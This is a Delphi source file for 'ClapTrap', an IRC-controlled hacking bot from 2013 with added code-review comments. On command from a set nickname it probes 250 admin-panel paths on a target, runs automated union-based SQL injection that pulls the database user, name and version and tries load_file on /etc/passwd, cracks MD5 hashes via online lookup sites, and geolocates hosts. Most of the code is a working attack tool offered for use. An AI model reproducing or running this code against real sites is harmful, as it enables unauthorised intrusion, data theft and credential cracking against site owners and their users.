// ClapTrap IRC Bot 0.5
// (C) Doddy Hackman 2013
unit menu;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, sSkinManager, StdCtrls, sButton, sEdit, sLabel, sGroupBox, ComCtrls,
sStatusBar, acPNG, ExtCtrls, GIFImg, sMemo, IdContext, IdBaseComponent,
IdComponent, IdTCPConnection, IdTCPClient, IdCmdTCPClient, IdIRC, PerlRegEx,
IdMultipartFormData, IdHTTP;
type
// The bot's only form: a skinned VCL window that owns the IRC client, the
// HTTP client, two regex helpers and the widgets the handlers report into.
TForm2 = class(TForm)
sSkinManager1: TsSkinManager; // AlphaControls skin engine, configured in FormCreate
sGroupBox1: TsGroupBox;
sLabel1: TsLabel;
sLabel2: TsLabel;
sLabel3: TsLabel;
sLabel4: TsLabel;
sEdit1: TsEdit; // IRC server host (read in sButton1Click)
sEdit2: TsEdit; // IRC server port, parsed with StrToInt in sButton1Click
sEdit3: TsEdit; // channel that is joined on connect and left on disconnect
sEdit4: TsEdit; // nickname whose private messages the bot obeys (compared in IdIRC1PrivateMessage)
sButton1: TsButton; // connect
sButton2: TsButton; // disconnect
sStatusBar1: TsStatusBar; // Panels[0] carries the progress text written by every handler
Image1: TImage;
sGroupBox2: TsGroupBox;
sMemo1: TsMemo; // activity log (Lines.Add from the command handlers)
Image2: TImage;
PerlRegEx1: TPerlRegEx; // matches the incoming command text
IdIRC1: TIdIRC; // IRC session; no TLS IO handler is attached anywhere in this unit
PerlRegEx2: TPerlRegEx; // scrapes values out of HTTP response bodies
IdHTTP1: TIdHTTP; // shared HTTP client used by !locateip, !crackmd5 and !sqli
procedure sButton1Click(Sender: TObject);
procedure sButton2Click(Sender: TObject);
procedure IdIRC1PrivateMessage(ASender: TIdContext; const ANicknameFrom,
AHost, ANicknameTo, AMessage: string);
procedure FormCreate(Sender: TObject);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
private
{ Private declarations }
public
{ Public declarations }
end;
var
// The single form instance. The handlers below reach the status bar through
// this global (Form2.sStatusBar1.Update) rather than through Self.
Form2: TForm2;
implementation
{$R *.dfm}
procedure TForm2.FormClose(Sender: TObject; var Action: TCloseAction);
// Closing the window ends the whole process; Action is left untouched.
begin
Application.Terminate;
end;
procedure TForm2.FormCreate(Sender: TObject);
// Switches the AlphaControls skin on before the form is shown. Skin files are
// read from a 'Data' folder beside the executable, so they are trusted exactly
// as much as the install directory itself.
var
skinDir: string;
begin
skinDir := ExtractFilePath(Application.ExeName) + 'Data';
with sSkinManager1 do
begin
SkinDirectory := skinDir;
SkinName := 'cappuccino';
Active := True;
end;
end;
procedure TForm2.IdIRC1PrivateMessage(ASender: TIdContext; const ANicknameFrom,
AHost, ANicknameTo, AMessage: string);
// OnPrivateMessage handler: every bot command is dispatched from here.
// Only messages whose sender nick equals sEdit4.Text are acted on. The command
// keyword and its single argument are extracted with PerlRegEx1 and the argument
// is spliced verbatim into outbound HTTP requests made with IdHTTP1 (or a local
// TIdHTTP for !panel). Progress is written to sStatusBar1, sMemo1 and sent back
// to the sender with IdIRC1.Say. Only the !panel loop catches HTTP errors; the
// other commands let any exception raised by Get/Post propagate out of the handler.
// Notes for whoever maintains or analyses this unit:
//  - the sender check is a plain nickname comparison and IRC does not
//    authenticate nicknames, so the control channel is spoofable;
//  - the IRC session and every web request are clear-text (http://);
//  - the argument captured by '(.*)' is neither validated nor encoded.
var
rta: string; // raw HTTP response body being scraped
z: integer; // sub-expression index in the reverse-DNS loop
par: TIdMultiPartFormDataStream; // POST body for the hostname lookup
target: string; // IP address resolved from the !locateip argument
var
IdHTTP: TIdHTTP; // throw-away client for the !panel loop; IdHTTP1 is used elsewhere
i: integer; // loop counter shared by the !panel loop and the !sqli column loop
var
url: string; // NOTE(review): never used
urldos: string; // NOTE(review): never used
code: string; // response body of the current probe request
codedos: string; // response body of the '1=0' comparison request
pass1: string; // token placed between words of the injected query ('+')
pass2: string; // token appended to the end of the injected query ('--')
urltest: string; // growing column list tried by the !sqli column loop
urlgen: string; // comma-separated column numbers, the echoing one replaced by 'hackman'
var
hextest: string; // hex-encoded path handed to load_file() (see dead store below)
web1: string; // link with the placeholder replaced by the marker only
web2: string; // link with the placeholder replaced by user()/database()/version()
web3: string; // link with the placeholder replaced by a load_file() call
full: string; // injected link still containing the 'hackman' placeholder
const
// Candidate admin/login paths that !panel requests one by one beneath the
// supplied base URL.
paginas: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
'login/index.asp', 'login/index.aspx', 'login/login.asp',
'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
'administracion/index.asp', 'administracion/index.aspx',
'administracion/login.asp', 'administracion/login.aspx',
'administracion/webmaster.asp', 'administracion/webmaster.aspx',
'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
'admin/admin.php', 'admin/index.php', 'admin/login.php',
'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php',
'admin/default.php', 'administracion/', 'administracion/index.php',
'administracion/login.php', 'administracion/ingresar.php',
'administracion/admin.php', 'administration/', 'administration/index.php',
'administration/login.php', 'administrator/index.php',
'administrator/login.php', 'administrator/system.php', 'system/',
'system/login.php', 'admin.php', 'login.php', 'administrador.php',
'administration.php', 'administrator.php', 'admin1.html', 'admin1.php',
'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php',
'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html',
'admin/index.html', 'admin/login.html', 'admin/home.php',
'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html',
'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/',
'administrator/index.html', 'administrator/login.html',
'administrator/account.html', 'administrator/account.php',
'administrator.html', 'login.html', 'modelsearch/login.php',
'moderator.php', 'moderator.html', 'moderator/login.php',
'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html',
'moderator/', 'account.php', 'account.html', 'controlpanel/',
'controlpanel.php', 'controlpanel.html', 'admincontrol.php',
'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp',
'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp',
'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
'administrator/index.asp', 'administrator/login.asp',
'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/',
'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/',
'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/',
'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind1/',
'SuperAdmin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/',
'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/',
'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/',
'system_administration/', 'ss_vms_admin_sm/');
begin
// Gatekeeper: only the configured nick is obeyed (see the notes above on why
// this is weak). Everything else falls straight through to the final end.
if ANicknameFrom = sEdit4.Text then
begin
// Help
// The pattern is unanchored: any message containing '!help' gets the reply.
PerlRegEx1.Regex := '!help';
PerlRegEx1.Subject := AMessage;
if PerlRegEx1.Match then
begin
IdIRC1.Say(ANicknameFrom, 'Hi , I am ClapTrap and my commands are :');
IdIRC1.Say(ANicknameFrom, '!locateip <target>');
IdIRC1.Say(ANicknameFrom, '!panel <target>');
IdIRC1.Say(ANicknameFrom, '!sqli <target>');
IdIRC1.Say(ANicknameFrom, '!crackmd5 <md5>');
IdIRC1.Say(ANicknameFrom, '!help <?>');
IdIRC1.Say(ANicknameFrom, 'Good Bye');
end;
//
// LocateIP
// !locateip <hostname>: hostname -> IP, then IP -> city/country/state, then
// IP -> other hostnames on it, all by scraping third-party lookup pages.
PerlRegEx1.Regex := '!locateip (.*)';
PerlRegEx1.Subject := AMessage;
if PerlRegEx1.Match then
begin
sStatusBar1.Panels[0].Text := '[+] LocateIP : Working';
Form2.sStatusBar1.Update;
sMemo1.Lines.Add('[+] LocateIP : Working');
IdIRC1.Say(ANicknameFrom, '[+] LocateIP : Working');
// NOTE(review): par is created here and never freed - leaked on every call.
par := TIdMultiPartFormDataStream.Create;
par.AddFormField('DOMAINNAME', PerlRegEx1.SubExpressions[1]);
rta := IdHTTP1.Post('http://whatismyipaddress.com/hostname-ip', par);
PerlRegEx2.Regex := 'Lookup IP Address: <a href=(.*)>(.*)<\/a>';
PerlRegEx2.Subject := rta;
if PerlRegEx2.Match then
begin
target := PerlRegEx2.SubExpressions[2];
rta := IdHTTP1.Get(
'http://www.melissadata.com/lookups/iplocation.asp?ipaddress=' +
target);
PerlRegEx2.Regex := 'City<\/td><td align=(.*)><b>(.*)<\/b><\/td>';
PerlRegEx2.Subject := rta;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, '[+] City : ' + PerlRegEx2.SubExpressions[2]
);
end
else
begin
IdIRC1.Say(ANicknameFrom, '[+] City : Not Found');
end;
PerlRegEx2.Regex := 'Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>';
PerlRegEx2.Subject := rta;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, '[+] Country : ' + PerlRegEx2.SubExpressions
[2]);
end
else
begin
IdIRC1.Say(ANicknameFrom, '[+] Country : Not Found');
end;
PerlRegEx2.Regex :=
'State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>';
PerlRegEx2.Subject := rta;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, '[+] State : ' + PerlRegEx2.SubExpressions
[2]);
end
else
begin
IdIRC1.Say(ANicknameFrom, '[+] State : Not Found');
end;
//
// Get DNS
rta := IdHTTP1.Get('http://www.ip-adress.com/reverse_ip/' + target);
PerlRegEx2.Regex := 'whois\/(.*?)\">Whois';
PerlRegEx2.Subject := rta;
// MatchAgain walks through the successive matches in the same subject.
while PerlRegEx2.MatchAgain do
begin
for z := 1 to PerlRegEx2.SubExpressionCount do
IdIRC1.Say(ANicknameFrom,
'[+] DNS Found : ' + PerlRegEx2.SubExpressions[z]);
end;
end;
// 'Finished' is reported even when the hostname never resolved to an IP.
sStatusBar1.Panels[0].Text := '[+] LocateIP : Finished';
Form2.sStatusBar1.Update;
sMemo1.Lines.Add('[+] LocateIP : Finished');
IdIRC1.Say(ANicknameFrom, '[+] LocateIP : Finished');
//
end;
//
// PanelFinder
// !panel <base-url>: requests every entry of paginas under the given URL and
// reports those the server answered.
PerlRegEx1.Regex := '!panel (.*)';
PerlRegEx1.Subject := AMessage;
if PerlRegEx1.Match then
begin
//
sStatusBar1.Panels[0].Text := '[+] PanelFinder : Working';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[+] PanelFinder : Working');
sMemo1.Lines.Add('[+] PanelFinder : Working');
// NOTE(review): Create belongs before the try; if it raises, the finally
// below calls Free on an uninitialised local.
try
IdHTTP := TIdHTTP.Create(nil);
for i := Low(paginas) to High(paginas) do
// Per-request try/except so one failed path does not end the loop.
try
sStatusBar1.Panels[0].Text := '[+] Testing : ' + paginas[i];
Form2.sStatusBar1.Update;
IdHTTP.Get(PerlRegEx1.SubExpressions[1] + '/' + paginas[i]);
// Only reached when Get did not raise. Indy raises
// EIdHTTPProtocolException for non-success status codes (by default), so
// this test is presumably almost always true here - confirm.
if IdHTTP.ResponseCode = 200 then
IdIRC1.Say(ANicknameFrom,
'[+] Link Found : ' + PerlRegEx1.SubExpressions[1]
+ '/' + paginas[i]);
except
// Both handlers discard the error: a missing page and an unreachable
// host look identical (nothing is logged or reported).
on E: EIdHttpProtocolException do
;
on E: Exception do
;
end;
finally
IdHTTP.Free;
end;
sStatusBar1.Panels[0].Text := '[+] PanelFinder : Finished';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[+] PanelFinder : Finished');
sMemo1.Lines.Add('[+] PanelFinder : Finished');
//
end;
//
// Crack MD5
// !crackmd5 <hash>: asks up to three online lookup sites in turn and relays
// the first cleartext found; the hash is passed through unvalidated.
PerlRegEx1.Regex := '!crackmd5 (.*)';
PerlRegEx1.Subject := AMessage;
if PerlRegEx1.Match then
begin
sStatusBar1.Panels[0].Text := '[+] CrackMD5 : Working';
Form2.sStatusBar1.Update;
sMemo1.Lines.Add('[+] CrackMD5 : Working');
IdIRC1.Say(ANicknameFrom, '[+] CrackMD5 : Working');
sStatusBar1.Panels[0].Text := '[+] Searching in md5.hashcracking.com ...';
Form2.sStatusBar1.Update;
rta := IdHTTP1.Get('http://md5.hashcracking.com/search.php?md5=' +
PerlRegEx1.SubExpressions[1]);
PerlRegEx2.Regex := 'Cleartext of (.*) is (.*)';
PerlRegEx2.Subject := rta;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, PerlRegEx1.SubExpressions[1]
+ ':' + PerlRegEx2.SubExpressions[2]);
end
else
begin
rta := IdHTTP1.Get('http://md5.rednoize.com/?q=' +
PerlRegEx1.SubExpressions[1]);
PerlRegEx2.Regex := '<div id=\"result\" >(.*)<\/div>';
PerlRegEx2.Subject := rta;
if PerlRegEx2.Match then
begin
// NOTE(review): presumably the page echoes the 32-character hash itself
// when it has no answer, hence the length test - confirm against the site.
if not(Length(PerlRegEx2.SubExpressions[1]) = 32) then
begin
IdIRC1.Say(ANicknameFrom, PerlRegEx1.SubExpressions[1]
+ ':' + PerlRegEx2.SubExpressions[1]);
end
else
begin
sStatusBar1.Panels[0].Text :=
'[+] Searching in md52.altervista.org ...';
Form2.sStatusBar1.Update;
rta := IdHTTP1.Get
('http://md52.altervista.org/index.php?md5=' +
PerlRegEx1.SubExpressions[1]);
PerlRegEx2.Regex :=
'<br>Password: <font color=\"Red\">(.*)<\/font><\/b>';
PerlRegEx2.Subject := rta;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, PerlRegEx1.SubExpressions[1]
+ ':' + PerlRegEx2.SubExpressions[1]);
end
else
begin
IdIRC1.Say(ANicknameFrom, '[-] Hash not cracked');
end;
end;
end;
end;
sStatusBar1.Panels[0].Text := '[+] CrackMD5 : Finished';
Form2.sStatusBar1.Update;
sMemo1.Lines.Add('[+] CrackMD5 : Finished');
IdIRC1.Say(ANicknameFrom, '[+] CrackMD5 : Finished');
end;
//
// SQLI Scanner
// !sqli <url>: three phases - a '1=1' vs '1=0' response comparison, a column
// count search (2..36) looking for the K0BRA marker, then a handful of fixed
// follow-up requests. No errors are caught in this branch.
PerlRegEx1.Regex := '!sqli (.*)';
PerlRegEx1.Subject := AMessage;
if PerlRegEx1.Match then
begin
sStatusBar1.Panels[0].Text := '[+] SQLI Scanner : Working';
Form2.sStatusBar1.Update;
sMemo1.Lines.Add('[+] SQLI Scanner : Working');
IdIRC1.Say(ANicknameFrom, '[+] SQLI Scanner : Working');
pass1 := '+';
pass2 := '--';
// NOTE(review): dead store - urltest is reassigned before its first use.
urltest := 'concat(0x4b30425241,1,0x4b30425241)';
sStatusBar1.Panels[0].Text := '[+] Checking ...';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[+] Checking ...');
// Two requests differing only in '1=1' vs '1=0'; unequal bodies are taken
// as the vulnerable signal.
code := IdHTTP1.Get
(PerlRegEx1.SubExpressions[1] + '1' + pass1 + 'and' + pass1 + '1=1' +
pass2);
codedos := IdHTTP1.Get
(PerlRegEx1.SubExpressions[1] + '1' + pass1 + 'and' + pass1 + '1=0' +
pass2);
if not(code = codedos) then
begin
IdIRC1.Say(ANicknameFrom, '[+] Vulnerable !');
sStatusBar1.Panels[0].Text := '[+] Finding columns number';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[+] Finding columns number');
urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' +
pass1 + 'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)';
urlgen := '1';
// Each pass appends one more marker column and re-requests the page.
for i := 2 to 36 do
begin
sStatusBar1.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i);
Form2.sStatusBar1.Update;
urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i)
+ ',0x4b30425241)';
urlgen := urlgen + ',' + IntToStr(i);
code := IdHTTP1.Get(PerlRegEx1.SubExpressions[1] + urltest + pass2);
PerlRegEx2.Regex := 'K0BRA(.*?)K0BRA';
PerlRegEx2.Subject := code;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, '[+] Columns Length : ' + IntToStr(i));
IdIRC1.Say(ANicknameFrom,
'[+] The number ' + PerlRegEx2.SubExpressions[1] + ' show data');
// The column number that echoed becomes the 'hackman' placeholder that
// the web1/web2/web3 variants below substitute.
urlgen := StringReplace(urlgen, PerlRegEx2.SubExpressions[1],
'hackman', []);
full := PerlRegEx1.SubExpressions[1] + '1' + pass1 + 'and' +
pass1 + '1=0' + pass1 + 'union' + pass1 + 'select' + pass1 +
urlgen;
IdIRC1.Say(ANicknameFrom, '[+] Link : ' + full);
//
// NOTE(review): pass1/pass2 are reassigned their existing values.
pass1 := '+';
pass2 := '--';
// NOTE(review): the first hextest value is dead; the next line overwrites it.
hextest := '0x2f6574632f706173737764'; // /etc/passwd
hextest := '0x633A2F78616D70702F726561642E747874';
// #c:/xampp/read.txt
web1 := StringReplace(full, 'hackman', '0x4b30425241', []);
web2 := StringReplace(full, 'hackman',
'concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)', []);
web3 := StringReplace(full, 'hackman',
'unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(' +
hextest + '))))', []);
sStatusBar1.Panels[0].Text := '[+] Getting more data ...';
Form2.sStatusBar1.Update;
// The next three checks only look for the marker in the response and
// report ON/OFF; nothing else from those responses is kept.
code := IdHTTP1.Get
(web1 + pass1 + 'from' + pass1 + 'mysql.user' + pass2);
PerlRegEx2.Regex := 'K0BRA';
PerlRegEx2.Subject := code;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, '[+] mysqluser : ON');
end
else
begin
IdIRC1.Say(ANicknameFrom, '[+] mysqluser : OFF');
end;
code := IdHTTP1.Get(web1 + pass1 + 'from' + pass1 +
'information_schema.tables' + pass2);
PerlRegEx2.Regex := 'K0BRA';
PerlRegEx2.Subject := code;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, '[+] information_schema.tables : ON');
end
else
begin
IdIRC1.Say(ANicknameFrom, '[+] information_schema.tables : OFF');
end;
code := IdHTTP1.Get(web3);
PerlRegEx2.Regex := 'K0BRA';
PerlRegEx2.Subject := code;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, '[+] load_file : ON');
end
else
begin
IdIRC1.Say(ANicknameFrom, '[+] load_file : OFF');
end;
sStatusBar1.Panels[0].Text := '[+] Getting DB details ...';
Form2.sStatusBar1.Update;
code := IdHTTP1.Get(web2);
// Greedy groups: with more than four markers in the page the captures
// may span more than one field.
PerlRegEx2.Regex := 'K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA';
PerlRegEx2.Subject := code;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom,
'[+] User : ' + PerlRegEx2.SubExpressions[1]);
IdIRC1.Say(ANicknameFrom,
'[+] Database : ' + PerlRegEx2.SubExpressions[2]);
IdIRC1.Say(ANicknameFrom,
'[+] Version : ' + PerlRegEx2.SubExpressions[3]);
sStatusBar1.Panels[0].Text := '[+] Done';
Form2.sStatusBar1.Update;
end
else
begin
IdIRC1.Say(ANicknameFrom, '[-] DB details not found');
sStatusBar1.Panels[0].Text := '[-] DB details not found';
Form2.sStatusBar1.Update;
end;
//
sStatusBar1.Panels[0].Text := '[+] Done';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[+] Done');
sMemo1.Lines.Add('[+] SQLI Scanner : Finished');
sStatusBar1.Panels[0].Text := '[+] SQLI Scanner : Finished';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[+] SQLI Scanner : Finished');
// Abort raises EAbort (silent in the VCL) to leave the loop; it also leaves
// this handler, so the 'Columns Length not found' and the second 'Finished'
// block after the loop never run on this path.
abort;
end
end;
// Reached only when no column count in 2..36 echoed the marker.
sStatusBar1.Panels[0].Text := '[-] Columns Length not found';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[-] Columns Length not found');
end
else
begin
sStatusBar1.Panels[0].Text := '[-] Not vulnerable';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[-] Not vulnerable');
end;
sStatusBar1.Panels[0].Text := '[+] SQLI Scanner : Finished';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[+] SQLI Scanner : Finished');
sMemo1.Lines.Add('[+] SQLI Scanner : Finished');
end;
end;
end;
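procedure TForm2.sButton1Click(Sender: TObject);
// Connect button: configures IdIRC1 from the edit boxes, connects and joins
// the channel. Every failure - including a non-numeric port - ends up as the
// '[-] Error' status plus a line in the memo instead of an unhandled exception.
// No TLS IO handler is attached to IdIRC1 in this unit, so the session is
// clear-text on whatever port is entered.
const
nick = 'ClapTrap';
begin
IdIRC1.Host := sEdit1.Text;
IdIRC1.Nickname := nick;
IdIRC1.Username := nick + ' 1 1 1 1';
IdIRC1.AltNickname := nick + '-l33t';
try
// StrToInt raises EConvertError on bad input; parsing inside the try turns
// a typo in the port box into the error status rather than a VCL dialog.
IdIRC1.Port := StrToInt(sEdit2.Text);
IdIRC1.Connect;
IdIRC1.Join(sEdit3.Text);
sStatusBar1.Panels[0].Text := '[+] Connected';
Form2.sStatusBar1.Update;
except
on E: Exception do
begin
// Keep the original status text, but record why the connection failed.
sStatusBar1.Panels[0].Text := '[-] Error';
sMemo1.Lines.Add('[-] Connect failed : ' + E.Message);
Form2.sStatusBar1.Update;
end;
end;
end;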
procedure TForm2.sButton2Click(Sender: TObject);
// Disconnect button: leaves the channel named in sEdit3, closes the IRC
// connection and marks the status bar offline. Neither call is guarded, so
// pressing the button while not connected surfaces whatever IdIRC1 raises.
begin
with IdIRC1 do
begin
Part(sEdit3.Text);
Disconnect;
end;
sStatusBar1.Panels[0].Text := '[+] OffLine';
Form2.sStatusBar1.Update;
end;
end.
// The End ?